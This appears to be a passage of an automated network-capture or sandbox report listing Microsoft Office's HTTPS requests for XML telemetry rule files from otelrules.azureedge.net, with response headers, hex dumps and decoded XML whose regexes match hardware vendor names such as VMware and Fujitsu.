                                                          2024-12-03 02:27:49 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          41192.168.2.44979513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:50 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:51 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:50 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 469
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                          ETag: "0x8DC582BBA701121"
                                                          x-ms-request-id: a11b7610-d01e-00ad-11d5-43e942000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022750Z-174f7845968pf68xhC1EWRr4h800000015ng000000002dzg
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:51 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          42192.168.2.44979613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:50 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:51 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:51 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 415
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                          ETag: "0x8DC582BA41997E3"
                                                          x-ms-request-id: 4b7a7cb4-201e-000c-0405-4179c4000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022751Z-174f78459684bddphC1EWRbht400000014x000000000sem4
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:51 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          43192.168.2.44979713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:50 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:51 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:51 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 477
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                          ETag: "0x8DC582BB8CEAC16"
                                                          x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022751Z-174f7845968zgtf6hC1EWRqd8s0000000y7g00000000dtcg
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:51 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          44192.168.2.44979813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:51 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:51 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:51 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 464
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                          ETag: "0x8DC582B97FB6C3C"
                                                          x-ms-request-id: 0e02d283-301e-000c-5b32-44323f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022751Z-174f7845968psccphC1EWRuz9s00000015dg00000000rzve
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:51 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          45192.168.2.44979913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:51 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:51 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:51 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 494
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                          ETag: "0x8DC582BB7010D66"
                                                          x-ms-request-id: ef6c78e4-401e-0067-2ec7-4309c2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022751Z-174f784596886s2bhC1EWR743w00000015e0000000001usw
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:51 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          46192.168.2.44980013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:53 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:53 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:53 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                          ETag: "0x8DC582B9748630E"
                                                          x-ms-request-id: e044a7be-f01e-003c-0c76-438cf0000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022753Z-174f7845968n2hr8hC1EWR9cag00000014ug00000000qfee
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:53 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          47192.168.2.44980113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:53 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:53 UTC471INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:53 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 472
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                          ETag: "0x8DC582B9DACDF62"
                                                          x-ms-request-id: f94122d4-501e-0047-4f2a-45ce6c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022753Z-174f7845968jrjrxhC1EWRmmrs00000015b000000000nc26
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_MISS
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:53 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          48192.168.2.44980413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:53 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:53 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:53 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 428
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                          ETag: "0x8DC582BAC4F34CA"
                                                          x-ms-request-id: f483c550-b01e-0098-3fc5-43cead000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022753Z-174f7845968vqt9xhC1EWRgten000000157g00000000pss0
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:53 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          49192.168.2.44980213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:53 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:53 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:53 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 404
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                          ETag: "0x8DC582B9E8EE0F3"
                                                          x-ms-request-id: 3f7caad5-701e-006f-6962-43afc4000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022753Z-174f7845968swgbqhC1EWRmnb400000015dg00000000e5rr
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:53 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          50192.168.2.44980313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:53 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:53 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:53 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 468
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                          ETag: "0x8DC582B9C8E04C8"
                                                          x-ms-request-id: 6eee8137-f01e-0096-4bb4-4210ef000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022753Z-174f7845968swgbqhC1EWRmnb400000015k000000000153a
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:53 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          51192.168.2.44980513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:55 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:55 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:55 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 499
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                          ETag: "0x8DC582B98CEC9F6"
                                                          x-ms-request-id: 98fcde7c-201e-0096-4eef-44ace6000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022755Z-174f7845968xlwnmhC1EWR0sv8000000153000000000ffwz
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
